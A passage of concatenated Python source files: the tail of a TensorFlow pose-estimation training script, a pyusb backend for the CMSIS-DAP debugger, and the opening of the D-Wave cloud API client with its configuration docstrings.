loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
print label_domain_value
print domain_label_value
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
= sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def load_and_enqueue(sess, net, data_layer, coord):
iter = 0
while not coord.should_stop():
blobs = data_layer.forward(iter)
iter += 1
if cfg.INPUT == 'RGBD':
data_blob = blobs['data_image_color']
data_p_blob = blobs['data_image_depth']
elif cfg.INPUT == 'COLOR':
data_blob = blobs['data_image_color']
elif cfg.INPUT == 'DEPTH':
data_blob = blobs['data_image_depth']
elif cfg.INPUT == 'NORMAL':
data_blob = blobs['data_image_normal']
if cfg.TRAIN.SINGLE_FRAME:
if cfg.TRAIN.SEGMENTATION:
if cfg.INPUT == 'RGBD':
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data']}
else:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
"""
scores: a list of tensors [batch_size, height, width, num_classes]
labels: a list of tensors [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
loss = 0
for i in range(cfg.TRAIN.NUM_STEPS):
score = scores[i]
label = labels[i]
cross_entropy = -tf.reduce_sum(label * score, reduction_indices=[3])
loss += tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(label))
loss /= cfg.TRAIN.NUM_STEPS
return loss
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, height, width, num_classes]
labels: a tensor [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
cross_entropy = -tf.reduce_sum(labels * scores, reduction_indices=[3])
loss = tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(labels)+1e-10)
return loss
def loss_quaternion(pose_pred, pose_targets, pose_weights):
with tf.name_scope('loss'):
distances = 1 - tf.square( tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1]) )
weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
loss = tf.div( tf.reduce_sum(tf.multiply(weights, distances)), tf.reduce_sum(weights) )
return loss
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
if cfg.TRAIN.SINGLE_FRAME:
# classification loss
if cfg.NETWORK == 'FCN8VGG':
scores = network.prob
labels = network.gt_label_2d_queue
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
scores = network.get_output('prob')
labels = network.get_output('gt_label_2d')
loss_cls = loss_cross_entropy_single_frame(scores, labels)
vertex_pred = network.get_output('vertex_pred')
vertex_targets = network.get_output('vertex_targets')
vertex_weights = network.get_output('vertex_weights')
# loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
if cfg.TRAIN.POSE_REG:
# pose_pred = network.get_output('poses_pred')
# pose_targets = network.get_output('poses_target')
# pose_weights = network.get_output('poses_weight')
# loss_pose = tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
# loss_pose = loss_quaternion(pose_pred, pose_targets, pose_weights)
loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
if cfg.TRAIN.ADAPT:
domain_score = network.get_output("domain_score")
domain_label = network.get_output("domain_label")
label_domain = network.get_output("label_domain")
loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
else:
loss = loss_cls + loss_vertex + loss_pose + loss_regu
else:
loss = loss_cls + loss_vertex + loss_regu
else:
scores = network.get_output('prob')
labels = network.get_output('gt_label_2d')
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
# classification loss
scores = network.get_output('outputs')
labels = network.get_output('labels_gt_2d')
loss = loss_cross_entropy(scores, labels) + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
# data layer
if cfg.TRAIN.SINGLE_FRAME:
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
else:
data_layer = GtDataLayer(roidb, imdb.num_classes)
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
print 'Solving...'
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
if cfg.TRAIN.POSE_REG:
if cfg.TRAIN.ADAPT:
sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer)
else:
sw.train_model(sess, train_op, loss, learning_rate, max_iters, data_layer)
print 'done solving'
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
sigma_2 = sigma ** 2
vertex_diff = vertex_pred - vertex_targets
diff = tf.multiply(vertex_weights, vertex_diff)
abs_diff = tf.abs(diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
in_loss = tf.pow(diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
loss = tf.div( tf.reduce_sum(in_loss), tf.reduce_sum(vertex_weights) + 1e-10 )
return loss
def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=[1]):
sigma_2 = sigma ** 2
box_diff = bbox_pred - bbox_targets
in_box_diff = bbox_inside_weights * box_diff
abs_in_box_diff = tf.abs(in_box_diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_in_box_diff, 1. / sigma_2)))
in_loss_box = tf.pow(in_box_diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_in_box_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
out_loss_box = bbox_outside_weights * in_loss_box
loss_box = tf.reduce_mean(tf.reduce_sum(
out_loss_box,
axis=dim
))
return loss_box
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
# RPN, class loss
rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
rpn_select = tf.where(tf.not_equal(rpn_label, -1))
rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
# RPN, bbox loss
rpn_bbox_pred = network.get_output('rpn_bbox_pred')
rpn_bbox_targets = network.get_output('rpn_bbox_targets')
rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
# RCNN, class loss
cls_score = network.get_output("cls_score")
label = tf.reshape(network.get_output("labels"), [-1])
loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
# RCNN, bbox loss
bbox_pred = network.get_output('bbox_pred')
bbox_targets = network.get_output('bbox_targets')
bbox_inside_weights = network.get_output('bbox_inside_weights')
bbox_outside_weights = network.get_output('bbox_outside_weights')
loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
# pose regression loss
loss_pose = network.get_output('loss_pose')[0]
# add losses
loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
# thread to load data
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
print 'Solving...'
sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
print 'done solving'
|
pyusb_backend.py | """
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .interface import Interface
import logging, os, threading
from ..dap_access_api import DAPAccessIntf
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
logging.error("PyUSB is required on a Linux Machine")
isAvailable = False
else:
isAvailable = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
isAvailable = isAvailable
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 64
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get hid interface
interface = None
interface_number = None
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number is None or interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
self.serial_number)
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & 0x80:
ep_in = endpoint
else:
ep_out = endpoint
# If there is no EP for OUT then we can use CTRL EP.
# The IN EP is required
if not ep_in:
raise DAPAccessIntf.DeviceError("Unable to open device -"
" no endpoints")
# Detach kernel driver
kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
dev.detach_kernel_driver(interface_number)
kernel_driver_was_attached = True
except NotImplementedError as e:
# Some implementations don't don't have kernel attach/detach
logging.debug('Exception detaching kernel driver: %s' %
str(e))
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError:
raise DAPAccessIntf.DeviceError("Unable to open device")
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
self.kernel_driver_was_attached = kernel_driver_was_attached
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def getAllConnectedInterface():
"""
returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
pass
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def setPacketCount(self, count):
# No interface level restrictions on count
self.packet_count = count
def setPacketSize(self, size):
self.packet_size = size
def getSerialNumber(self):
return self.serial_number
def close(self):
"""
close the interface
"""
assert self.closed is False
logging.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
logging.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class FindDap(object):
"""CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""Return True if this is a DAP device, False otherwise"""
try:
device_string = dev.product
except ValueError as error:
# Permission denied error gets reported as ValueError (langid)
logging.debug(("ValueError \"{}\" while trying to access dev.product "
"for idManufacturer=0x{:04x} idProduct=0x{:04x}. "
"This is probably a permission issue.").format(error, dev.idVendor, dev.idProduct))
return False
except usb.core.USBError as error:
logging.warning("Exception getting product string: %s", error)
return False
except IndexError as error:
logging.warning("Internal pyusb error: %s", error)
return False
if device_string is None:
return False
if device_string.find("CMSIS-DAP") < 0:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
client.py | # Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
D-Wave API clients handle communications with :term:`solver` resources: problem submittal,
monitoring, samples retrieval, etc.
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> Q = {(0, 0): -1, (0, 4): 0, (4, 0): 2, (4, 4): -1}
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... computation = solver.sample_qubo(Q, num_reads=5)
...
>>> for i in range(5): # doctest: +SKIP
... print(computation.samples[i][0], computation.samples[i][4])
...
(1, 0)
(1, 0)
(0, 1)
(0, 1)
(0, 1)
"""
from __future__ import division, absolute_import
import re
import sys
import time
import json
import logging
import threading
import requests
import warnings
import operator
import collections
import base64
import hashlib
import codecs
import concurrent.futures
from itertools import chain
from functools import partial, wraps
from concurrent.futures import ThreadPoolExecutor
from dateutil.parser import parse as parse_datetime
from plucky import pluck
from six.moves import queue, range
import six
from dwave.cloud.package_info import __packagename__, __version__
from dwave.cloud.exceptions import *
from dwave.cloud.config import load_config, legacy_load_config, parse_float
from dwave.cloud.solver import Solver, available_solvers
from dwave.cloud.concurrency import PriorityThreadPoolExecutor
from dwave.cloud.upload import ChunkedData
from dwave.cloud.utils import (
TimeoutingHTTPAdapter, BaseUrlSession, user_agent,
datetime_to_timestamp, utcnow, epochnow, cached, retried)
__all__ = ['Client']
logger = logging.getLogger(__name__)
class Client(object):
"""
Base client class for all D-Wave API clients. Used by QPU and software :term:`sampler`
classes.
Manages workers and handles thread pools for submitting problems, cancelling tasks,
polling problem status, and retrieving results.
Args:
endpoint (str):
D-Wave API endpoint URL.
token (str):
Authentication token for the D-Wave API.
solver (dict/str):
Default solver features (or simply solver name).
proxy (str):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
request_timeout (float, default=60):
Connect and read timeout (in seconds) for all requests to the D-Wave API.
polling_timeout (float, default=None):
Problem status polling timeout (in seconds), after which polling is aborted.
connection_close (bool, default=False):
Force HTTP(S) connection close after each request.
headers (dict/str):
Additional HTTP headers.
Other Parameters:
Unrecognized keys (str):
All unrecognized keys are passed through to the appropriate client class constructor
as string keyword arguments.
An explicit key value overrides an identical user-defined key value loaded from a
configuration file.
Examples:
This example directly initializes a :class:`~dwave.cloud.client.Client`.
Direct initialization uses class constructor arguments, the minimum being
a value for `token`.
>>> from dwave.cloud import Client
>>> client = Client(token='secret')
>>> # code that uses client
>>> client.close()
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Default API endpoint
DEFAULT_API_ENDPOINT = 'https://cloud.dwavesys.com/sapi/'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Number of problems to include in a submit/status query
_SUBMIT_BATCH_SIZE = 20
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_UPLOAD_PROBLEM_THREAD_COUNT = 1
_UPLOAD_PART_THREAD_COUNT = 10
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
# Poll back-off interval [sec]
_POLL_BACKOFF_MIN = 1
_POLL_BACKOFF_MAX = 60
# Tolerance for server-client clocks difference (approx) [sec]
_CLOCK_DIFF_MAX = 1
# Poll grouping time frame; two scheduled polls are grouped if closer than [sec]:
_POLL_GROUP_TIMEFRAME = 2
# Downloaded solver definition cache maxage [sec]
_SOLVERS_CACHE_MAXAGE = 300
# Multipart upload parameters
_UPLOAD_PART_SIZE_BYTES = 5 * 1024 * 1024
_UPLOAD_PART_RETRIES = 2
_UPLOAD_REQUEST_RETRIES = 2
_UPLOAD_RETRIES_BACKOFF = lambda retry: 2 ** retry
@classmethod
def from_config(cls, config_file=None, profile=None, client=None,
endpoint=None, token=None, solver=None, proxy=None,
headers=None, legacy_config_fallback=False, **kwargs):
"""Client factory method to instantiate a client instance from configuration.
Configuration values can be specified in multiple ways, ranked in the following
order (with 1 the highest ranked):
1. Values specified as keyword arguments in :func:`from_config()`
2. Values specified as environment variables
3. Values specified in the configuration file
Configuration-file format is described in :mod:`dwave.cloud.config`.
If the location of the configuration file is not specified, auto-detection
searches for existing configuration files in the standard directories
of :func:`get_configfile_paths`.
If a configuration file explicitly specified, via an argument or
environment variable, does not exist or is unreadable, loading fails with
:exc:`~dwave.cloud.exceptions.ConfigFileReadError`. Loading fails
with :exc:`~dwave.cloud.exceptions.ConfigFileParseError` if the file is
readable but invalid as a configuration file.
Similarly, if a profile explicitly specified, via an argument or
environment variable, is not present in the loaded configuration, loading fails
with :exc:`ValueError`. Explicit profile selection also fails if the configuration
file is not explicitly specified, detected on the system, or defined via
an environment variable.
Environment variables: ``DWAVE_CONFIG_FILE``, ``DWAVE_PROFILE``,
``DWAVE_API_CLIENT``, ``DWAVE_API_ENDPOINT``, ``DWAVE_API_TOKEN``,
``DWAVE_API_SOLVER``, ``DWAVE_API_PROXY``, ``DWAVE_API_HEADERS``.
Environment variables are described in :mod:`dwave.cloud.config`.
Args:
config_file (str/[str]/None/False/True, default=None):
Path to configuration file.
If ``None``, the value is taken from ``DWAVE_CONFIG_FILE`` environment
variable if defined. If the environment variable is undefined or empty,
auto-detection searches for existing configuration files in the standard
directories of :func:`get_configfile_paths`.
If ``False``, loading from file is skipped; if ``True``, forces auto-detection
(regardless of the ``DWAVE_CONFIG_FILE`` environment variable).
profile (str, default=None):
Profile name (name of the profile section in the configuration file).
If undefined, inferred from ``DWAVE_PROFILE`` environment variable if
defined. If the environment variable is undefined or empty, a profile is
selected in the following order:
1. From the default section if it includes a profile key.
2. The first section (after the default section).
3. If no other section is defined besides ``[defaults]``, the defaults
section is promoted and selected.
client (str, default=None):
Client type used for accessing the API. Supported values are ``qpu``
for :class:`dwave.cloud.qpu.Client` and ``sw`` for
:class:`dwave.cloud.sw.Client`.
endpoint (str, default=None):
API endpoint URL.
token (str, default=None):
API authorization token.
solver (dict/str, default=None):
Default :term:`solver` features to use in :meth:`~dwave.cloud.client.Client.get_solver`.
Defined via dictionary of solver feature constraints
(see :meth:`~dwave.cloud.client.Client.get_solvers`).
For backward compatibility, a solver name, as a string,
is also accepted and converted to ``{"name": <solver name>}``.
If undefined, :meth:`~dwave.cloud.client.Client.get_solver` uses a
solver definition from environment variables, a configuration file, or
falls back to the first available online solver.
proxy (str, default=None):
URL for proxy to use in connections to D-Wave API. Can include
username/password, port, scheme, etc. If undefined, client
uses the system-level proxy, if defined, or connects directly to the API.
headers (dict/str, default=None):
Newline-separated additional HTTP headers to include with each
API request, or a dictionary of (key, value) pairs.
legacy_config_fallback (bool, default=False):
If True and loading from a standard D-Wave Cloud Client configuration
file (``dwave.conf``) fails, tries loading a legacy configuration file (``~/.dwrc``).
Other Parameters:
Unrecognized keys (str):
All unrecognized keys are passed through to the appropriate client class constructor
as string keyword arguments.
An explicit key value overrides an identical user-defined key value loaded from a
configuration file.
Returns:
:class:`~dwave.cloud.client.Client` (:class:`dwave.cloud.qpu.Client` or :class:`dwave.cloud.sw.Client`, default=:class:`dwave.cloud.qpu.Client`):
Appropriate instance of a QPU or software client.
Raises:
:exc:`~dwave.cloud.exceptions.ConfigFileReadError`:
Config file specified or detected could not be opened or read.
:exc:`~dwave.cloud.exceptions.ConfigFileParseError`:
Config file parse failed.
Examples:
A variety of examples are given in :mod:`dwave.cloud.config`.
This example initializes :class:`~dwave.cloud.client.Client` from an
explicitly specified configuration file, "~/jane/my_path_to_config/my_cloud_conf.conf"::
>>> from dwave.cloud import Client
>>> client = Client.from_config(config_file='~/jane/my_path_to_config/my_cloud_conf.conf') # doctest: +SKIP
>>> # code that uses client
>>> client.close()
"""
# try loading configuration from a preferred new config subsystem
# (`./dwave.conf`, `~/.config/dwave/dwave.conf`, etc)
config = load_config(
